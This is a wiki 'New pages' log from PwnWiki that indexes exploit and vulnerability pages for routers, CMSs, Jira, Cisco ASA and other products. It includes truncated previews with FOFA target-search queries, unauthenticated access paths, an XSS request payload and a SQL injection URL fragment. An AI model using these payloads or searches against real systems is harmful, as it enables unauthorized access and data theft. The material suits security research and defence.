New pages
From PwnWiki
(newest | oldest) View (newer 50 | older 50) (20 | 50 | 100 | 250 | 500)
- 12:09, 29 June 2021 中國移動 禹路由 simple-index.asp 越權訪問漏洞/zh-cn (hist | edit) [176 bytes] Pwnwiki (talk | contribs) (Created page with "中国移动 禹路由 simple-index.asp 越权访问漏洞")
- 12:06, 29 June 2021 天融信負載均衡TopApp-LB enable tool debug.php 遠程命令執行漏洞/zh-cn (hist | edit) [276 bytes] Pwnwiki (talk | contribs) (Created page with "天融信负载均衡TopApp-LB enable tool debug.php 远程命令执行漏洞")
- 12:02, 29 June 2021 天融信負載均衡TopApp-LB enable tool debug.php 遠程命令執行漏洞 (hist | edit) [312 bytes] Pwnwiki (talk | contribs) (Created page with "<languages /> ==FOFA== <pre> app="天融信-TopApp-LB-负载均衡系统" </pre> ==Payload== <translate> 設置var=0,tool=1,再進行命令拼接造成遠程命令執行...")
- 11:59, 29 June 2021 中國移動 禹路由 simple-index.asp 越權訪問漏洞 (hist | edit) [198 bytes] Pwnwiki (talk | contribs) (Created page with "<languages /> ==FOFA== <pre> title="互联世界 物联未来-登录" </pre> ==Payload== <pre> /simple-index.asp </pre> <translate> 越過管理員驗證獲取Wifl賬號...")
- 11:55, 29 June 2021 中國移動 禹路由 ExportSettings.sh 敏感信息泄露漏洞 (hist | edit) [203 bytes] Pwnwiki (talk | contribs) (Created page with "<languages /> ==FOFA== <pre> title="互联世界 物联未来-登录" </pre> ==Payload== <pre> /cgi-bin/ExportSettings.sh </pre> <translate> 其中password為登錄後台...")
- 09:21, 29 June 2021 Netgear WNAP320 2.0.3 - 'macAddress' RCE漏洞 (hist | edit) [1,346 bytes] Pwnwiki (talk | contribs) (Created page with "<pre> # Exploit Title: Netgear WNAP320 2.0.3 - 'macAddress' Remote Code Execution (RCE) (Unauthenticated) # Vulnerability: Remote Command Execution on /boardDataWW.php macAddr...")
- 09:20, 29 June 2021 CVE-2021-26078 Atlassian Jira Server/Data Center 8.16.0 XSS漏洞 (hist | edit) [1,801 bytes] Pwnwiki (talk | contribs) (Created page with "<pre> # Exploit Title: Atlassian Jira Server/Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS) # Date: 06/05/2021 # Exploit Author: CAPTAIN_HOOK # Vendor Homepage: htt...")
- 09:19, 29 June 2021 CVE-2021-35475 SAS Environment Manager 2.5 XSS漏洞 (hist | edit) [1,136 bytes] Pwnwiki (talk | contribs) (Created page with "<pre> # Exploit Title: SAS Environment Manager 2.5 - 'name' Stored Cross-Site Scripting (XSS) # Date: 24/06/2021 # Exploit Author: Luqman Hakim Zahari @ Saitamang # Vendor Hom...")
- 09:18, 29 June 2021 WordPress Plugin YOP Polls 6.2.7 XSS漏洞 (hist | edit) [2,568 bytes] Pwnwiki (talk | contribs) (Created page with "<pre> # Exploit Title: WordPress Plugin YOP Polls 6.2.7 - Stored Cross Site Scripting (XSS) # Date: 09/06/2021 # Exploit Author: inspired - Toby Jackson # Vendor Homepage: htt...")
- 09:16, 29 June 2021 CVE-2020-3580 Cisco ASA XSS漏洞 (hist | edit) [198 bytes] Pwnwiki (talk | contribs) (Created page with "==XSS== <pre> POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1 Host: ciscoASA.local Content-Type: application/x-www-form-urlencoded Content-Length: 44 SAMLResponse="><svg/onload=a...")
- 10:27, 28 June 2021 OpenSNS 遠程代碼執行漏洞/zh-cn (hist | edit) [814 bytes] Pwnwiki (talk | contribs) (Created page with "OpenSNS 远程代码执行漏洞")
- 10:22, 28 June 2021 OpenSNS 遠程代碼執行漏洞 (hist | edit) [886 bytes] Pwnwiki (talk | contribs) (Created page with "{| style="margin: auto; width: 750px;color:green;" | style="text-align: left; margin: 1em 1em 1em 0; border: 1px solid #20A3C0; padding: .2em;" | {| cellspacing="2px" | valig...")
- 16:29, 27 June 2021 CVE-2021-31955 Windows內核信息泄露漏洞/zh-cn (hist | edit) [152 bytes] Pwnwiki (talk | contribs) (Created page with "CVE-2021-31955 Windows內核信息泄露漏洞")
- 16:28, 27 June 2021 CVE-2021-27850 Apache Tapestry遠程執行代碼漏洞/zh-cn (hist | edit) [148 bytes] Pwnwiki (talk | contribs) (Created page with "==影响版本==")
- 16:26, 27 June 2021 CVE-2021-31955 Windows內核信息泄露漏洞 (hist | edit) [188 bytes] Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==漏洞影響== </translate> <pre> The exploit works on all 64-bit vulnerable targets. </pre> ==POC== https://github.com/mavillon1/CVE-2021-31955-POC")
- 16:23, 27 June 2021 CVE-2021-27850 Apache Tapestry遠程執行代碼漏洞 (hist | edit) [184 bytes] Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==影響版本== </translate> <pre> Apache Tapestry 5.4.5、5.5.0、5.6.2 and 5.7.0 </pre> ==POC== https://github.com/kahla-sec/CVE-2021-27850_POC")
- 15:40, 27 June 2021 Active UC index.action 遠程命令執行漏洞 (hist | edit) [1,555 bytes] Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==漏洞影響== </translate> Active UC ==FOFA== <pre> title="网动统一通信平台(Active UC)" </pre> ==POC== <pre> POST /acenter/index.action...")
- 12:10, 26 June 2021 CVE-2021–34506 Microsoft Edge 安全功能繞過漏洞 (hist | edit) [1,922 bytes] Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==漏洞影響== </translate> <pre> Microsoft Edge < 91.0.864.59 </pre> ==POC== <pre> <b><u>SOME TEXT IN DIFFERENT LANGUAGE </u></b> <br> Polític...")
- 08:13, 26 June 2021 寶塔linux面板 6.0 存儲型XSS Getshell漏洞/zh-cn (hist | edit) [1,928 bytes] Pwnwiki (talk | contribs) (Created page with "宝塔linux面板 6.0 存储型XSS Getshell漏洞")
- 08:10, 26 June 2021 寶塔linux面板 6.0 存儲型XSS Getshell漏洞 (hist | edit) [2,252 bytes] Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==漏洞影響== </translate> <translate> 寶塔Linux面板<6.0 </translate> <translate> ==漏洞利用== </translate> <translate> 在web目錄下...")
- 19:58, 25 June 2021 EyouCMS 文件包含Getshell漏洞 (hist | edit) [690 bytes] Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==漏洞影響== </translate> EyouCMS <translate> ==漏洞利用== </translate> <translate> 製作如下結構的壓縮文件: </translate> <pre>...")
- 19:27, 25 June 2021 Lightweight facebook-styled blog 1.3 遠程代碼執行漏洞 (hist | edit) [4,240 bytes] Pwnwiki (talk | contribs) (Created page with "<pre> ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::...")
- 19:26, 25 June 2021 Simple Client Management System 1.0 - 'uemail' SQL注入漏洞 (hist | edit) [1,128 bytes] Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==影響版本== </translate> Version: 1.0 ==EXP== <pre> # Exploit Title: Simple Client Management System 1.0 - 'uemail' SQL Injection (Unauthentic...")
- 19:24, 25 June 2021 CVE-2019-12744 Seeddms 5.1.10 遠程代碼執行漏洞 (hist | edit) [8,410 bytes] Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==影響版本== </translate> Version: Seeddms 5.1.10 ==EXP== <pre> # Exploit Title: Seeddms 5.1.10 - Remote Command Execution (RCE) (Authenticated)...")
- 19:23, 25 June 2021 SAPSprint 7.60 - 'SAPSprint' Unquoted Service Path (hist | edit) [981 bytes] Pwnwiki (talk | contribs) (Created page with "<pre> # Exploit Title: SAPSprint 7.60 - 'SAPSprint' Unquoted Service Path # Discovery by: Brian Rodriguez # Date: 21-06-2021 # Vendor Homepage: https://brother.com/ # Tested...")
- 15:01, 25 June 2021 凡諾CMS 未授權訪問&文件包含Getshell漏洞 (hist | edit) [677 bytes] Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==未授權訪問== </translate> <pre> /fannuo/admin/cms_admin_edit.php?id=1 </pre> <translate> 在Cookie中增加admin_name字段即可造成未授...")
- 14:53, 25 June 2021 騎士CMS模版註入 &文件包含getshell漏洞 (hist | edit) [1,323 bytes] Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==漏洞描述== </translate> <translate> 騎士cms人才系統,是一項基於PHP+MYSQL為核心開發的一套免費 + 開源專業人才網站...")
- 14:48, 25 June 2021 CVE-2020-15906 Tiki Wiki CMS Groupware 認證繞過漏洞/zh-cn (hist | edit) [6,145 bytes] Pwnwiki (talk | contribs) (Created page with "Tiki Wiki CMS Groupware或简称为Tiki(最初称为TikiWiki)是一种免费且开源的基于Wiki的内容管理系统和在线办公套件。在如下这些版本21.2, 2...")
- 14:47, 25 June 2021 CVE-2020-15906 Tiki Wiki CMS Groupware 認證繞過漏洞 (hist | edit) [6,253 bytes] Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==漏洞描述== </translate> <translate> Tiki Wiki CMS Groupware或簡稱為Tiki(最初稱為TikiWiki)是一種免費且開源的基於Wiki的...")
- 14:40, 25 June 2021 Fiyo CMS 2.0.6.1 權限提升漏洞 (hist | edit) [3,214 bytes] Pwnwiki (talk | contribs) (Created page with "<pre> # Exploit Title: Privilege Escalation (Manipulation of User Group) Vulnerability on Fiyo CMS 2.0.6.1 # Google Dork: no # Date: 11-03-2017 # Exploit Author: @rungga_reksy...")
- 14:32, 25 June 2021 安天追影威脅分析系統越權訪問漏洞/zh-cn (hist | edit) [385 bytes] Pwnwiki (talk | contribs) (Created page with "==漏洞描述==")
- 14:03, 25 June 2021 安天追影威脅分析系統越權訪問漏洞 (hist | edit) [540 bytes] Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==漏洞描述== </translate> <translate> 通過修改返回包內容,可以繞過驗證,直接登陸系統,可以查看到部分敏感信息....")
- 13:28, 25 June 2021 YouDiancms延時注入漏洞 (hist | edit) [473 bytes] Pwnwiki (talk | contribs) (Created page with "<languages /> ==FOFA== <pre> icon_hash="1728964041" </pre> <translate> ==漏洞影響== </translate> YouDiancms ==Payload== <pre> GET /index.php/Channel/voteAdd HTTP/1.1 Hos...")
- 17:41, 24 June 2021 Huawei (華爲) dg8045 身份驗證繞過漏洞 (hist | edit) [1,847 bytes] Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==影響版本== </translate> Version: dg8045 ==POC== <pre> # Title: Huawei dg8045 - Authentication Bypass # Date: 2020-06-24 # Author: Abdalrahman...")
- 17:40, 24 June 2021 CVE-2020-35575 TP-Link TL-WR841N 命令注入漏洞 (hist | edit) [2,868 bytes] Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==影響版本== </translate> Version: TL-WR841N 0.9.1 4.0 ==EXP== <pre> # Exploit Title: TP-Link TL-WR841N - Command Injection # Date: 2020-12-13 #...")
- 17:39, 24 June 2021 CVE-2009-2265 Adobe ColdFusion 8 遠程代碼執行漏洞 (hist | edit) [4,035 bytes] Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==影響版本== </translate> Adobe ColdFusion 8 ==EXP== <pre> # Exploit Title: Adobe ColdFusion 8 - Remote Command Execution (RCE) # Google Dork:...")
- 17:25, 24 June 2021 CVE-2021-1531 Cisco Modeling Labs 2.1.1-b19 RCE漏洞 (hist | edit) [1,794 bytes] Pwnwiki (talk | contribs) (Created page with "<pre> Cisco Modeling Labs 2.1.1-b19 Post-Auth RCE Vulnerability CVE-2021-1531 ======= Details ======= Authenticated command injection in the web portal via the X-Original-F...")
- 17:24, 24 June 2021 HPE RDA-CAS 1.23.826 拒絕服務漏洞 (hist | edit) [2,481 bytes] Pwnwiki (talk | contribs) (Created page with "<pre> #!/usr/bin/python # -*- coding: UTF-8 -*- # # hpfreeze.py # # HPE Remote Device Access Unauthenticated Denial of Service # # Jeremy Brown [jbrown3264/gmail] # June 2021...")
- 17:23, 24 June 2021 CVE-2021-23024 F5 BIG-IQ VE 8.0.0-2923215 RCE漏洞 (hist | edit) [3,599 bytes] Pwnwiki (talk | contribs) (Created page with "<pre> F5 BIG-IQ VE v8.0.0-2923215 Post-auth Remote Root RCE CVE-2021-23024 ======= Details ======= It was possible to execute commands with root privileges as an authentica...")
- 16:13, 24 June 2021 致遠OA A6 test.jsp SQL注入漏洞 (hist | edit) [10,010 bytes] Pwnwiki (talk | contribs) (Created page with "<languages /> ==FOFA== <pre> title="致远A8+协同管理软件.A6" </pre> ==Payload== <pre> http://xxx.xxx.xxx.xxx/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20data...")
- 12:16, 24 June 2021 FileCOPA FTP Server 1.01 拒絕服務漏洞/en (hist | edit) [4,632 bytes] Pwnwiki (talk | contribs) (Created page with "==Affected Versions==")
- 11:58, 24 June 2021 CVE-2021-28476 Microsoft Hyper-V 遠程代碼執行漏洞/zh-tw (hist | edit) [201 bytes] Pwnwiki (talk | contribs) (Created page with "CVE-2021-28476 Microsoft Hyper-V 遠程代碼執行漏洞")
- 11:54, 24 June 2021 JQuery 1.7.2 任意文件下載漏洞/en (hist | edit) [207 bytes] Pwnwiki (talk | contribs) (Created page with "JQuery 1.7.2 arbitrary file download vulnerability")
- 11:46, 24 June 2021 FileCOPA FTP Server 1.01 拒絕服務漏洞/zh-tw (hist | edit) [4,627 bytes] Pwnwiki (talk | contribs) (Created page with "==影響版本==")
- 11:40, 24 June 2021 DedeCms v5.6 嵌入惡意代碼執行漏洞/zh-tw (hist | edit) [434 bytes] Pwnwiki (talk | contribs) (Created page with "DedeCms v5.6 嵌入惡意代碼執行漏洞")
- 11:40, 24 June 2021 DedeCMS v5.7 友情鏈接CSRF GetShell漏洞/zh-tw (hist | edit) [936 bytes] Pwnwiki (talk | contribs) (Created page with "<code>dedecms_csrf.php</code> 的內容如下:")
- 11:38, 24 June 2021 Responsive FileManager 9.13.4 目錄遍歷漏洞/zh-cn (hist | edit) [2,126 bytes] Pwnwiki (talk | contribs) (Created page with "==影响版本==")
- 11:15, 24 June 2021 CVE-2021-32305 Websvn 2.6.0 遠程代碼執行漏洞/zh-tw (hist | edit) [1,071 bytes] Pwnwiki (talk | contribs) (Created page with "==漏洞影響==")
- 11:06, 24 June 2021 CVE-2016-9299 代碼執行漏洞/zh-cn (hist | edit) [288 bytes] Pwnwiki (talk | contribs) (Created page with "CVE-2016-9299 代码执行漏洞")
- 11:05, 24 June 2021 TamronOS IPTV系統任意用戶添加修改漏洞/en (hist | edit) [289 bytes] Pwnwiki (talk | contribs) (Created page with "==Vulnerability Impact==")